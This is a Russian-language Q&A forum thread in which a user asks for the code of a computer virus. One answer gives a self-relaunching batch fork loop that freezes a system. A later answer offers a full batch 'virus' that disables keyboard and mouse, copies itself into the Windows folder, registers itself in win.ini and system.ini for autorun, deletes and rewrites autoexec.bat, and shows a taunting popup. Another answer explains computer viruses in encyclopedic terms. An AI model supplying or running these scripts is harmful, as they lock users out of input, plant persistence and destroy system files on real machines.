Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиПоискОблакоComboВсе проекты

кто нибудь знает сам код вируса?

Nick Профи (672), закрыт 13 лет назад
Лучший ответ
Protos Профи (767) 13 лет назад
какого?) )
вирус не 1 на весь мир)
NickПрофи (672) 13 лет назад
любого, какого знаеш
Остальные ответы
Димыч Мастер (1856) 13 лет назад
чо сказал.. . кто дурак...
Пользователь удален Гуру (4816) 13 лет назад
Простейший вредоносный bat - скрипт (аналогичный bash скрипт пишется легко) :
Пусть есть файл 1.bat:
1:
start 1.bat
goto 1

Вешает систему намертво.
ТАХИР ИСАКОВИЧ Гуру (4216) 13 лет назад
Компью́терные ви́русы — разновидность вредоносных программ, отличительной особенностью которых является способность к размножению (саморепликации) . В дополнение к этому они могут повреждать или полностью уничтожать данные, подконтрольные пользователю, от имени которого была запущена заражённая программа.

Неспециалисты иногда к компьютерным вирусам причисляют все вредоносные программы, такие как троянские кони, программы-шпионы.
Левая кавычка Условимся называть вирусами саморазмножающиеся программы, паразитирующие на исполняемых файлах, динамических библиотеках, драйверах и других объектах подобного рода. Эпоха вирусов закончилась вместе с крушением MS-DOS. (Крис Касперски) Правая кавычка

Вероятно последнее предложение цитаты было обусловлено предположенем, что переход к ОС с разграничением доступа (каковой MS-DOS не является) сделает существование вирусов невозможным. Вирусы распространялись, внедряя себя в исполняемый код других программ, или же заменяя собой другие программы.

Из-за внедрения исполняемого кода — например, макросов — в документы, появились макровирусы, поражающие такие документы (например Microsoft Word и Excel).

До недавнего времени считалось, что являясь программой вирус может заразить только программу — какое угодно изменение непрограммы является не заражением, а просто повреждением данных. Подразумевалось, что такие копии вируса не получают управления, будучи информацией, не использующейся процессором в качестве инструкций. Так, например неформатированный текст (*.txt — plain/text (см. MIME)) не мог бы быть переносчиком вируса.

Некоторое время спустя появились вирусы, использующие уязвимости в популярном программном обеспечении (например, Adobe Photoshop, Internet Explorer, Outlook), в общем случае обрабатывающем данные. Вирусы стали распространяться посредством внедрения в последовательности данных (например, картинки, тексты, и т. д. ) специального кода, использующего уязвимости программного обеспечения. Можно сказать, что именно с этого периода пользователь компьютера стал наименее защищён от вирусов.
Сергей Рукавишников Знаток (318) 4 года назад
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
Похожие вопросы